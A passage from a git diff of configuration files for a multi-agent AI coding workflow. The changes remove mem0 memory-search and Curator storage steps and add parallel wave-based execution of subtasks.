(SRP).", + "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. Follows Redis best practices. Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", "error_identification": "No errors. Decorator handles hits (return cached) and misses (fetch, populate). Hierarchical keys (user:{id}:profile) enable smart invalidation. TTL prevents indefinite stale data. 10/10 performance score.", @@ -732,7 +678,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential. mem0 tiered search found 'async-0023' in project tier discussing similar pattern.", + "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential.", "error_identification": "BatchProcessor.process_items() lines 15-22: self.results[item.id] = result modifies shared dict from multiple coroutines. Works in tests (sequential) but races in production (concurrent). Monitor PASS (no security), Evaluator 6.5/10 (reliability issues).", @@ -770,15 +716,15 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Successful REST implementation following established patterns. mem0 tiered search for 'REST endpoint validation' returns 5 existing patterns across tiers: input validation (rest-0012, project tier), error responses (rest-0015, org tier), async handling (rest-0018, project tier), authentication (rest-0021, org tier), rate limiting (rest-0024, org tier). Actor correctly applied these patterns - no novel learning. Success validates existing pattern completeness for standard REST patterns. Creating new pattern would duplicate rest-0012 content.", + "reasoning": "Successful REST implementation following established patterns. Actor correctly applied standard patterns for input validation, error responses, async handling, and authentication - no novel learning. Success validates existing pattern completeness for standard REST patterns.", "error_identification": "No errors. Implementation correctly: validates input with Pydantic (rest-0012), returns proper HTTP status codes (rest-0015), uses async/await consistently (rest-0018), checks JWT auth (rest-0021). All existing patterns applied correctly.", - "root_cause_analysis": "Success root cause: Actor followed established REST patterns from mem0. Patterns rest-0012 through rest-0024 provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", + "root_cause_analysis": "Success root cause: Actor followed established REST patterns. Standard patterns provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", "correct_approach": "Implementation follows existing patterns correctly. No correction needed.\n\n```python\n# Actor's implementation (correct)\n@router.post('/users', response_model=UserResponse)\nasync def create_user(user: UserCreate, db: AsyncSession = Depends(get_db)):\n # Validates via Pydantic (rest-0012)\n existing = await db.execute(select(User).where(User.email == user.email))\n if existing.scalar():\n raise HTTPException(status_code=409, detail='Email exists') # rest-0015\n new_user = User(**user.dict())\n db.add(new_user)\n await db.commit() # rest-0018\n return new_user\n```", - "key_insight": "When existing mem0 patterns comprehensively cover a pattern, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", + "key_insight": "When existing patterns comprehensively cover a use case, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", "bullet_updates": [ {"bullet_id": "rest-0012", "tag": "helpful", "reason": "Pydantic validation pattern correctly applied"}, @@ -805,14 +751,13 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp - Provide generic advice without code ("best practices" useless) - Output markdown formatting (raw JSON only, no ```json```) - Make assumptions about unprovided code (analyze actual code) -- Create suggested_new_bullets without mem0 tiered search (avoid duplicates) +- Create suggested_new_bullets without checking for existing duplicates - Tag bullets without evidence (must be used in actor_code) - Forget minimum lengths (reasoning≥200, correct_approach≥150, key_insight≥50) ## What Reflector ALWAYS Does -- Use MCP tools (sequential-thinking complex, mem0 tiered search) -- Call mcp__mem0__map_tiered_search FIRST to check all tiers +- Use MCP tools (sequential-thinking for complex cases, context7 for libraries) - Perform 5 Whys root cause (beyond symptoms) - Include code examples (5+ lines, incorrect + correct) - Ground in {{language}}/{{framework}} (specific syntax) @@ -820,19 +765,18 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp - Check suggested_new_bullets quality (100+ chars, code for impl/sec/perf) - Validate JSON before returning (required fields, structure) - Reference specific lines/functions in error_identification -- Note tier context when referencing existing patterns -Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing by Curator. +Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing. # VALIDATION CHECKLIST Before outputting: -- [ ] MCP Tools: Searched mem0 with mcp__mem0__map_tiered_search? Sequential-thinking for complex? +- [ ] MCP Tools: Used sequential-thinking for complex cases? context7 for library issues? - [ ] JSON: All fields? No markdown blocks? - [ ] Length: reasoning≥200, root_cause≥150, key_insight≥50? - [ ] Code: 5+ lines showing incorrect + correct? @@ -842,8 +786,7 @@ Before outputting: - [ ] Bullet Quality: 100+ chars? Code for impl/sec/perf? - [ ] Technology: {{language}}/{{framework}} syntax? - [ ] References: Specific lines/functions from actor_code? -- [ ] Deduplication: Checked all mem0 tiers before suggesting new bullets? -- [ ] Tier Context: Noted which tier existing patterns came from? +- [ ] Deduplication: Checked for existing similar patterns before suggesting new bullets? - [ ] Bullet Tags: Only bullets Actor used with evidence? diff --git a/.claude/agents/research-agent.md b/.claude/agents/research-agent.md index 7322923..bc942c9 100644 --- a/.claude/agents/research-agent.md +++ b/.claude/agents/research-agent.md @@ -276,24 +276,3 @@ Read( {{/if}} - - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**Relevant patterns from mem0:** - -{{existing_patterns}} - -**Usage**: Reference these patterns in your search to find similar implementations. - -{{/if}} - -{{#unless existing_patterns}} -*No mem0 patterns available. Search results will help seed the knowledge base.* -{{/unless}} - - diff --git a/.claude/agents/task-decomposer.md b/.claude/agents/task-decomposer.md index a6e43fd..6b0bf45 100644 --- a/.claude/agents/task-decomposer.md +++ b/.claude/agents/task-decomposer.md @@ -33,7 +33,6 @@ machine-readable blueprint for the Actor/Monitor pipeline. │ └─ Derive category: 1-4=low, 5-6=medium, 7-10=high │ │ │ │ 3. GATHER CONTEXT (if complexity ≥ 3) │ -│ └─ ALWAYS: mcp__mem0__map_tiered_search (historical decompositions) │ │ └─ IF ambiguous: sequentialthinking │ │ └─ IF external lib: get-library-docs │ │ └─ Handle fallbacks if tools fail/return empty │ @@ -85,43 +84,19 @@ machine-readable blueprint for the Actor/Monitor pipeline. | Condition | Tool | Query Pattern | |-----------|------|---------------| -| **ALWAYS** (complexity ≥ 3) | mcp__mem0__map_tiered_search | `"feature implementation [type]"`, `"task decomposition [domain]"` | | Ambiguous/complex goal | sequentialthinking | Iterative refinement of scope and dependencies | | External library | get-library-docs | Setup/quickstart guides for initialization order | | Unfamiliar domain | deepwiki | `"How does [repo] structure [feature]?"` | **Skip MCP when**: complexity_score ≤ 2, trivial change, clear internal pattern exists -### Re-rank Retrieved Patterns - -After mcp__mem0__map_tiered_search, re-rank results by relevance to current decomposition: - -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.feature_type matches goal_type: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.success_rate > 0.8: relevance_score += 2 - IF pattern.subtask_count in [5..8]: relevance_score += 1 # optimal range - IF pattern.created_at > (now - 60_days): relevance_score += 1 - -SORT by relevance_score DESC -USE top 2 patterns as decomposition reference -DOCUMENT: "Referenced patterns: [IDs] with relevance scores [X, Y]" -``` - ### MCP Fallback Procedures ``` -IF mcp__mem0__map_tiered_search returns NO results: - → Document "No historical precedent" in assumptions - → Add +1 to Risk factor for affected subtask (e.g., Risk: +0 → +1) - → Add research subtask if total complexity >= 5 - IF MCP tool FAILS (timeout/unavailable): → Document in open_questions → Add +1 to Risk factor for ALL subtasks (uncertainty penalty) - → Add "Decomposition lacks historical validation" to risks + → Add "Decomposition lacks tool validation" to risks Note: Uncertainty adjustments modify the Risk factor in the formula, applied BEFORE the cap at 10. Example: Base(1)+Novelty(+1)+Deps(+1)+Scope(+2)+Risk(+0→+1 uncertainty)=6 @@ -498,7 +473,6 @@ When invoked with `mode: "re_decomposition"` from the orchestrator, you receive ## Before Submitting Decomposition **Analysis Completeness**: -- [ ] Ran mcp__mem0__map_tiered_search for similar features - [ ] Used sequential-thinking for complex/ambiguous goals - [ ] Checked library docs for initialization requirements - [ ] Identified all risks (not empty for medium/high complexity) @@ -570,9 +544,8 @@ If circular dependency detected (e.g., A→B→C→A): - [ ] Open questions flagged that need clarification before proceeding **MCP Tool Usage Verification**: -- [ ] Did you call mcp__mem0__map_tiered_search FIRST? (mandatory for non-trivial goals) - [ ] Did you use insights from MCP tools in your decomposition? -- [ ] If no historical context found, documented "No relevant history found" in analysis +- [ ] If MCP tools unavailable, documented limitations in analysis @@ -593,16 +566,6 @@ If circular dependency detected (e.g., A→B→C→A): **Subtask Context** (if refining existing decomposition): {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -The following patterns have been learned from previous successful implementations: - -{{existing_patterns}} - -**Instructions**: Use these patterns to inform your task decomposition strategy and identify proven implementation approaches. -{{/if}} - {{#if feedback}} ## Previous Decomposition Feedback @@ -724,7 +687,7 @@ Omit for simple CRUD, internal helpers, obvious logic. ## Decomposition Process (5 Phases) **Phase 1: Understand** → Scope, boundaries, complexity estimate -**Phase 2: Context** → mcp__mem0__map_tiered_search, library docs, existing patterns +**Phase 2: Context** → Library docs, existing patterns, sequential thinking **Phase 3: Atomize** → Break into independently implementable+testable units **Phase 4: Dependencies** → Map prerequisites, order by foundation→dependent→parallel **Phase 5: Validate** → Testable criteria, realistic scores, no placeholders diff --git a/.claude/commands/map-debate.md b/.claude/commands/map-debate.md index b1db61e..acb5301 100644 --- a/.claude/commands/map-debate.md +++ b/.claude/commands/map-debate.md @@ -9,7 +9,7 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth 1. Execute steps in order without pausing; only ask user if (a) `task-decomposer` returns blocking `analysis.open_questions` with no subtasks OR (b) Monitor sets `escalation_required === true` 2. Use exact `subagent_type` specified — never substitute `general-purpose` 3. Call each agent individually — no combining or skipping steps -4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7) +4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7 Retry Loop) 5. **ALWAYS generate 3 variants** — no conditional check (unlike map-efficient Self-MoA) 6. Use **debate-arbiter with model=opus** for synthesis @@ -20,15 +20,14 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth ``` 1. DECOMPOSE → task-decomposer 2. FOR each subtask: - a. CONTEXT → mem0 tiered search (`mcp__mem0__map_tiered_search`) - b. RESEARCH → if existing code understanding needed - c. 3 Actors (parallel) → security/performance/simplicity focuses - d. 3 Monitors (parallel) → validate + extract decisions - e. debate-arbiter (opus) → cross-evaluate + synthesize - f. Final Monitor → validate synthesis - g. If invalid: retry with feedback (max 5) - h. If risk_level ∈ {high, medium}: → Predictor - i. Apply changes + a. RESEARCH → if existing code understanding needed + b. 3 Actors (parallel) → security/performance/simplicity focuses + c. 3 Monitors (parallel) → validate + extract decisions + d. debate-arbiter (opus) → cross-evaluate + synthesize + e. Final Monitor → validate synthesis + f. If invalid: retry with feedback (max 5) + g. If risk_level ∈ {high, medium}: → Predictor + h. Apply changes 3. SUMMARY → optionally suggest /map-learn ``` @@ -87,32 +86,7 @@ Before calling any agents for the subtask, build a single **AI Packet** with uni Pass this packet verbatim to Actor/Monitor/debate-arbiter/Predictor. Do NOT rename tags mid-flow. -### 2.1 Get Context + Re-rank - -```bash -# Patterns from mem0 (tiered: branch → project → org) -mcp__mem0__map_tiered_search(query="[subtask description]", limit=5) - -# Optional: broader conceptual lookup -mcp__mem0__map_tiered_search(query="[concept]", limit=5) -``` - -**Re-rank retrieved patterns** by relevance to current subtask: - -``` -FOR each pattern in retrieved_patterns: - relevance_score = evaluate: - - Domain match: Does pattern's domain match subtask? (+2) - - Technology overlap: Same language/framework? (+1) - - Recency: Created within 30 days? (+1) - - Success indicator: Marked validated/production? (+1) - - Complexity alignment: Similar complexity_score? (+1) - - SORT patterns by relevance_score DESC - PASS top 3 patterns to Actor as "context_patterns" -``` - -### 2.2 Research (Conditional) +### 2.1 Research (Conditional) **Call if:** refactoring, bug fixes, extending existing code, touching 3+ files **Skip for:** new standalone features, docs, config @@ -131,7 +105,7 @@ Max tokens: 1500" Pass `executive_summary` to Actor if `confidence >= 0.7`. -### 2.3 Quality-Stakes Assessment +### 2.2 Quality-Stakes Assessment **Purpose:** Determine deployment context and set minimum quality thresholds before launching Actor variants. @@ -161,7 +135,7 @@ quality_context = { **Rationale:** Prevents quality erosion in debate by establishing non-negotiable baselines before variants propose solutions. -### 2.4 Parallel Actors (3 Variants) +### 2.3 Parallel Actors (3 Variants) **ALWAYS call 3 Actors in parallel with different focuses:** @@ -172,7 +146,6 @@ Task( description="Implement subtask [ID] - Security (v1)", prompt="Implement with SECURITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of security focus. approach_focus: security, variant_id: v1, self_moa_mode: true @@ -185,7 +158,6 @@ Task( description="Implement subtask [ID] - Performance (v2)", prompt="Implement with PERFORMANCE focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of performance focus. approach_focus: performance, variant_id: v2, self_moa_mode: true @@ -198,7 +170,6 @@ Task( description="Implement subtask [ID] - Simplicity (v3)", prompt="Implement with SIMPLICITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of simplicity focus. approach_focus: simplicity, variant_id: v3, self_moa_mode: true @@ -206,7 +177,7 @@ Follow the Actor agent protocol output format. Ensure `decisions_made` is includ ) ``` -### 2.5 Parallel Monitors (3 Validations) +### 2.4 Parallel Monitors (3 Validations) Validate each variant in parallel: @@ -229,7 +200,7 @@ If a SpecificationContract is provided: include `spec_contract_compliant` + `spe Repeat for v2 and v3 in parallel. -### 2.6 debate-arbiter (Opus) +### 2.5 debate-arbiter (Opus) ``` Task( @@ -268,7 +239,7 @@ Include: comparison_matrix, decision_rationales, synthesis_reasoning (8 steps)." ) ``` -### 2.7 Final Monitor +### 2.6 Final Monitor Validate synthesized code: @@ -286,7 +257,7 @@ Return ONLY valid JSON following MonitorReviewOutput schema." ) ``` -### 2.8 Retry Loop +### 2.7 Retry Loop If Final Monitor returns `valid === false`: 1. Provide feedback including arbiter's synthesis_reasoning @@ -302,7 +273,7 @@ retry_context = { } ``` -### 2.9 Escalation Gate (AskUserQuestion) +### 2.8 Escalation Gate (AskUserQuestion) If Monitor returns `escalation_required === true`, ask user: @@ -321,7 +292,7 @@ AskUserQuestion(questions=[ ]) ``` -### 2.10 Conditional Predictor +### 2.9 Conditional Predictor ```python # Enhanced predictor decision: @@ -392,11 +363,11 @@ else: ) ``` -### 2.11 Apply Changes +### 2.10 Apply Changes Apply synthesized code via Write/Edit tools. Proceed to next subtask. -### 2.12 Gate 2: Tests Available / Run +### 2.11 Gate 2: Tests Available / Run After applying changes, run tests if available. @@ -408,7 +379,7 @@ After applying changes, run tests if available. If no tests found: mark gate as skipped and proceed. -### 2.13 Gate 3: Formatter / Linter +### 2.12 Gate 3: Formatter / Linter After tests gate, run formatter/linter checks if available. diff --git a/.claude/commands/map-debug.md b/.claude/commands/map-debug.md index 8e2cf6b..6bdd2a3 100644 --- a/.claude/commands/map-debug.md +++ b/.claude/commands/map-debug.md @@ -40,12 +40,7 @@ Debugging workflow focuses on analysis before implementation: ## Step 1: Analyze the Issue -Before calling task-decomposer, gather context and search mem0: - -```bash -# Search for similar debugging patterns -PATTERN_CONTEXT=$(mcp__mem0__map_tiered_search(query="debug [issue type]", section_filter="DEBUGGING_TECHNIQUES", limit=5)) -``` +Before calling task-decomposer, gather context: 1. **Read error logs/stack traces** (if provided in $ARGUMENTS) 2. **Identify affected files**: Use Grep/Glob to find relevant code @@ -64,7 +59,6 @@ Task( **Context:** - Error logs: [if available] - Affected files: [from analysis] -- Similar past issues: [from mem0 search] Output JSON with: - subtasks: array of {id, description, debug_type: 'investigation'|'fix'|'verification', acceptance_criteria} @@ -240,7 +234,6 @@ This is **completely optional**. Run it when debugging patterns are valuable for ## MCP Tools for Debugging -- `mcp__mem0__map_tiered_search` - Find similar past debugging sessions - `mcp__sequential-thinking__sequentialthinking` - Complex root cause analysis - `mcp__context7__get-library-docs` - Check library documentation for known issues - `mcp__deepwiki__ask_question` - Learn from how others solved similar issues diff --git a/.claude/commands/map-efficient.md b/.claude/commands/map-efficient.md index b91c5f3..658e473 100644 --- a/.claude/commands/map-efficient.md +++ b/.claude/commands/map-efficient.md @@ -24,7 +24,6 @@ State machine enforces sequencing, Python validates completion, hooks inject rem /map-efficient does NOT use these agents (by design): - **Evaluator** — quality scoring not needed; Monitor validates correctness directly - **Reflector** — lesson extraction is a separate step via `/map-learn` -- **Curator** — pattern storage is a separate step via `/map-learn` This is NOT a violation of MAP agent rules. Learning is decoupled into `/map-learn` (optional, run after workflow completes) to reduce token usage during execution. @@ -48,7 +47,7 @@ Both files must stay in sync. The orchestrator updates `step_state.json` on ever │ map-efficient.md (THIS FILE - ~540 lines) │ │ 1. Load state → Get next step instruction │ │ 2. Route to appropriate executor based on step phase │ -│ 3. Execute step (Actor/Monitor/mem0/tests/etc) │ +│ 3. Execute step (Actor/Monitor/tests/etc) │ │ 4. Validate completion → Update state │ │ 5. If more steps → Recurse; Else → Complete │ └─────────────────────────────────────────────────────────────┘ @@ -129,9 +128,11 @@ This eliminates reasoning overhead — the contract IS the specification.""" ) # After decomposer returns: -# 1. Extract subtask IDs from blueprint and register them in state: +# 1. Save the full blueprint JSON for wave computation: +# Write the decomposer output to .map//blueprint.json +# 2. Extract subtask IDs from blueprint and register them in state: # python3 .map/scripts/map_orchestrator.py set_subtasks ST-001 ST-002 ST-003 -# 2. Validate step completion: +# 3. Validate step completion: # python3 .map/scripts/map_orchestrator.py validate_step "1.0" ``` @@ -221,6 +222,76 @@ Then use the **Write** tool to create `.map//workflow_state.json`: } ``` +### Wave Computation (after INIT_STATE) + +After INIT_STATE (1.6) completes, compute execution waves from the dependency DAG: + +```bash +python3 .map/scripts/map_orchestrator.py set_waves --blueprint .map/${BRANCH}/blueprint.json +``` + +This reads the blueprint, builds a dependency graph, computes topological waves, +and splits waves by file conflicts. The result is stored in `step_state.json`. + +**Wave execution**: If waves are computed, subtasks within a wave run their Actor +and Monitor phases in parallel. Check wave status with: + +```bash +WAVE=$(python3 .map/scripts/map_orchestrator.py get_wave_step) +MODE=$(echo "$WAVE" | jq -r '.mode') +``` + +If `mode` is `"parallel"`, launch all actors in the wave in ONE message using +multiple `Task()` calls, then all monitors in ONE message. If `mode` is +`"sequential"`, use the standard single-subtask loop below. + +**Parallel wave execution loop**: + +``` +loop: + WAVE = get_wave_step() + if WAVE.is_complete: goto final_verification + + if WAVE.mode == "sequential": + # Single subtask — same as standard behavior below + execute_current_sequential_loop() + else: + # === PARALLEL WAVE === + # Phase A: Prep (sequential per subtask - lightweight) + for each subtask in WAVE.subtasks: + build XML_PACKET, run CONTEXT_SEARCH, optional RESEARCH + + # Phase B: Parallel Actors + # Launch ALL Task(subagent_type="actor") calls in ONE message + # Example: Task(actor, "Implement ST-002") + Task(actor, "Implement ST-004") + + # Phase C: Parallel Monitors + # After all actors return, launch ALL monitors in ONE message + # Example: Task(monitor, "Validate ST-002") + Task(monitor, "Validate ST-004") + + # Phase D: Retry handling + # For each monitor that returned valid=false: + # Re-run actor + monitor for that subtask (serially) + # Track retries per subtask: validate_wave_step SUBTASK_ID STEP_ID + + # Phase E: Per-wave gates + # Run tests + linter ONCE for the entire wave + # pytest / npm test / etc. + + # Phase F: Advance wave + python3 .map/scripts/map_orchestrator.py advance_wave + + # Update workflow state for all subtasks in batch: + python3 .map/scripts/map_step_runner.py update_workflow_state_batch '[ + {"subtask_id": "ST-002", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-002", "step_name": "monitor", "new_state": "MONITOR_PASSED"}, + {"subtask_id": "ST-004", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-004", "step_name": "monitor", "new_state": "MONITOR_PASSED"} + ]' +``` + +Linear DAGs naturally degrade to single-subtask waves (identical to current behavior). + ### Phase: XML_PACKET (2.0) ```python @@ -235,20 +306,6 @@ xml_packet = create_xml_packet(subtask) # Packet boundaries are unambiguous — agents parse by tag, not by heuristics ``` -### Phase: MEM0_SEARCH (2.1) - -```bash -# Tiered search: branch → project → org -mcp__mem0__map_tiered_search( - query="[subtask description]", - limit=5, - user_id="org:[org_name]", - run_id="proj:[project_name]:branch:[branch_name]" -) - -# Re-rank by relevance, pass top 3 to Actor -``` - ### Phase: RESEARCH (2.2) ```python @@ -283,10 +340,6 @@ Task( [paste from .map//current_packet.xml] - -[top context_patterns from mem0 + relevance_score] - - [AAG contract from decomposition: Actor -> Action -> Goal] @@ -466,7 +519,6 @@ Answer: [YES/NO - if NO, explain why not] Question 2: For EACH subtask, did I: - Create XML packet? [YES/NO per subtask] - - Call mem0 search? [YES/NO per subtask] - Call research-agent if 3+ files? [YES/NO/N/A per subtask] - Call Actor agent? [YES/NO per subtask] - Call Monitor agent after Actor? [YES/NO per subtask] @@ -521,7 +573,7 @@ if [ "$IS_COMPLETE" = "true" ]; then # Go to Step 3 else # CONTEXT DISTILLATION before recurse: - # Do NOT pass full RESEARCH logs, mem0 results, or Actor/Monitor transcripts. + # Do NOT pass full RESEARCH logs or Actor/Monitor transcripts. # Pass ONLY the distilled state to keep new context in SFT comfort zone (~4k tokens): # # 1. findings.md — distilled research output (not raw search logs) diff --git a/.claude/commands/map-fast.md b/.claude/commands/map-fast.md index ed16ee7..be195f3 100644 --- a/.claude/commands/map-fast.md +++ b/.claude/commands/map-fast.md @@ -6,9 +6,9 @@ description: Minimal workflow for small, low-risk changes (40-50% savings, NO le **⚠️ WARNING: Use for small, low-risk production changes only. Do not skip tests.** -Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector, Curator. +Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector. -**Consequences:** No impact analysis, no quality scoring, no learning, knowledge base never improves. +**Consequences:** No impact analysis, no quality scoring, no learning. Implement the following: @@ -30,7 +30,6 @@ Minimal agent sequence (token-optimized, reduced analysis depth): **Agents INTENTIONALLY SKIPPED:** - Predictor (no impact analysis) - Reflector (no lesson extraction) -- Curator (no mem0 pattern updates) **⚠️ CRITICAL:** This is NOT the full MAP workflow. Learning and impact analysis are disabled. @@ -122,12 +121,12 @@ After all subtasks completed: 2. Create commit with message 3. Summarize what was implemented -**Note:** No mem0 pattern updates (learning disabled). +**Note:** Learning disabled (Reflector skipped). ## Critical Constraints - MAX 3 iterations per subtask -- NO learning cycle (Reflector/Curator skipped) +- NO learning cycle (Reflector skipped) - NO impact analysis (Predictor skipped) - NO quality scoring diff --git a/.claude/commands/map-learn.md b/.claude/commands/map-learn.md index 5e53b41..69521c7 100644 --- a/.claude/commands/map-learn.md +++ b/.claude/commands/map-learn.md @@ -4,7 +4,7 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea # MAP Learn - Post-Workflow Learning -**Purpose:** Standalone command to extract and preserve lessons AFTER completing any MAP workflow. +**Purpose:** Standalone command to extract lessons AFTER completing any MAP workflow. **When to use:** - After `/map-efficient` completes (to preserve patterns from the workflow) @@ -13,24 +13,18 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea **What it does:** 1. Calls Reflector agent to analyze workflow outputs and extract patterns -2. Calls Curator agent to store patterns directly via mem0 MCP tools -3. Verifies patterns stored via `mcp__mem0__map_tiered_search` - -**Storage Architecture:** -- Branch tier: `run_id="proj:PROJECT:branch:BRANCH"` (branch-scoped patterns) -- Project tier: `run_id="proj:PROJECT"` (shared across branches) -- Org tier: `user_id="org:ORG"` only (shared across all projects) +2. Outputs a structured learning summary for the user to review **Workflow Summary Input:** $ARGUMENTS --- -## ⚠️ IMPORTANT: This is an OPTIONAL step +## IMPORTANT: This is an OPTIONAL step -**You are NOT required to run this command.** No MAP workflow includes automatic learning — learning is always a separate step via this command. +**You are NOT required to run this command.** No MAP workflow includes automatic learning -- learning is always a separate step via this command. Use /map-learn when: -- You completed /map-efficient, /map-debug, or /map-fast and want to preserve lessons +- You completed /map-efficient, /map-debug, or /map-fast and want to extract lessons - You want to batch-learn from multiple workflows at once - You want to manually trigger learning for custom workflows @@ -56,7 +50,7 @@ Check that $ARGUMENTS contains workflow summary: Workflow: /map-efficient "Add user authentication" Subtasks completed: 3 Files changed: api/auth.py, models/user.py, tests/test_auth.py -Iterations: 5 total (Actor→Monitor loops) +Iterations: 5 total (Actor->Monitor loops) Subtask 1 (Actor output): [paste Actor JSON output] @@ -73,7 +67,7 @@ Subtask 1 (Monitor result): ## Step 2: Reflector Analysis -**⚠️ MUST use subagent_type="reflector"** (NOT general-purpose): +**MUST use subagent_type="reflector"** (NOT general-purpose): ``` Task( @@ -84,15 +78,6 @@ Task( **Workflow Summary:** $ARGUMENTS -**MANDATORY FIRST STEP:** -1. Call mcp__mem0__map_tiered_search to check if similar patterns already exist across tiers -2. Only suggest new bullets if pattern is genuinely novel (not found in any tier) -3. Reference existing patterns with their tier context in your analysis - -**Tier Search Parameters:** -- user_id: 'org:ORG_NAME' (for org-level context) -- run_id: 'proj:PROJECT_NAME:branch:BRANCH_NAME' (for branch context with inheritance) - **Analysis Instructions:** Analyze holistically across ALL subtasks: @@ -111,106 +96,17 @@ Analyze holistically across ALL subtasks: **Output JSON with:** - key_insight: string (one sentence takeaway for entire workflow) -- patterns_used: array of strings (existing patterns applied successfully, with tier labels) +- patterns_used: array of strings (existing patterns applied successfully) - patterns_discovered: array of strings (new patterns worth preserving) - bullet_updates: array of {bullet_id, tag: 'helpful'|'harmful', reason} - suggested_new_bullets: array of {section, content, code_example, rationale} -- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings} -- mem0_duplicates_found: array of {pattern, tier, memory_id} (from tiered search results)" +- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings}" ) ``` -**Verification:** Check Reflector output contains evidence of `mcp__mem0__map_tiered_search` call: -- Should show: "mem0 tiered search found existing patterns in [tier]..." -- Or: "No similar patterns found in any tier. This appears to be a novel pattern." - -**If tiered search was NOT called:** Reflector did not follow instructions. Flag this as critical issue. - --- -## Step 3: Curator Storage - -**⚠️ MUST use subagent_type="curator"** (NOT general-purpose): - -``` -Task( - subagent_type="curator", - description="Store workflow learnings via mem0 MCP tools", - prompt="Store Reflector insights using mem0 MCP tools directly: - -**Reflector Insights:** -[paste Reflector JSON output from Step 2] - -**MANDATORY: Curator now calls mem0 MCP tools directly (NO JSON delta output)** - -**Curator will:** -1. Call mcp__mem0__map_tiered_search to verify no duplicates exist -2. Call mcp__mem0__map_add_pattern for each new pattern -3. Call mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 - -**Tier Selection:** -- Branch tier: run_id='proj:PROJECT:branch:BRANCH' (for unvalidated patterns) -- Project tier: run_id='proj:PROJECT' (for proven patterns) -- Org tier: user_id='org:ORG' only (for cross-project patterns) - -**Deduplication via Fingerprinting:** -- Each pattern has SHA256 fingerprint of normalized content -- mcp__mem0__map_add_pattern returns {created: false} if duplicate exists -- Reference existing pattern ID instead of creating duplicate - -**Promotion Criteria:** -- helpful_count >= 3: Eligible for promotion to higher tier -- helpful_count >= 5: Auto-promote to project tier -- helpful_count >= 10 with cross-project usage: Promote to org tier" -) -``` - -**Verification:** Curator will: -- Show tool calls to `mcp__mem0__map_tiered_search` for deduplication -- Show tool calls to `mcp__mem0__map_add_pattern` for new patterns -- Report patterns stored with their tier and memory_id - -**If Curator outputs JSON instead of calling tools:** Curator did not follow updated instructions. Flag this as critical issue. - ---- - -## Step 4: Verify Storage - -Verify patterns were stored correctly using mem0 tiered search: - -``` -mcp__mem0__map_tiered_search( - query="[pattern content from Reflector]", - user_id="org:ORG_NAME", - run_id="proj:PROJECT:branch:BRANCH", - include_archived=false -) -``` - -**Expected output:** -```json -{ - "results": [ - { - "memory_id": "mem-abc123", - "text": "Pattern content...", - "tier": "branch", - "metadata": { - "section_id": "IMPLEMENTATION_PATTERNS", - "helpful_count": 1, - "created_at": "2025-01-12T..." - } - } - ], - "total": 1 -} -``` - -**If patterns not found:** Check Curator tool call outputs for errors. Retry storage if needed. - ---- - -## Step 5: Summary Report +## Step 3: Summary Report Provide learning summary: @@ -219,114 +115,40 @@ Provide learning summary: **Workflow Analyzed:** [workflow type from input] **Total Subtasks:** [N] -**Iterations 